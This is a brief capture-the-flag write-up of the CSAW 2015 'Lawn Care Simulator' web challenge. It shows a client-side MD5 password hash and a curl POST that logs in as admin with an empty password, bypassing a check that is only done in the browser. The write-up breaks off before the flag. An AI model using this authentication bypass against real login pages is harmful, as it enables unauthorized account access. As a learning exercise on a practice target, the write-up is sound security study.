CSAW 2015 - Lawn Care Simulator (200pts) writeup

The challenge description was:

This web challenge was really easy, actually it was so easy that I think it wasn't meant to be that way. When you visit the link you are greeted with the following screen:

CSAW 2015 - Lawn Care Simulator (200pts) writeup - 01

Checking for SQL injection wasn't returning anything indicating it was what we had to do, so I checked the network traffic while trying to log in and got the following POST data:

**username:**test **password:**098f6bcd4621d373cade4e832627b4f6

Trying to log without any password wasn't possible but checked on the client side, so after trying it with curl in a terminal:

mrt$ curl '' --data 'username=admin&password='
<title>Lawn Care Simulator 2015</title>
<script src="//code.jquery.com/jquery-1.11.3.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">

We got our flag: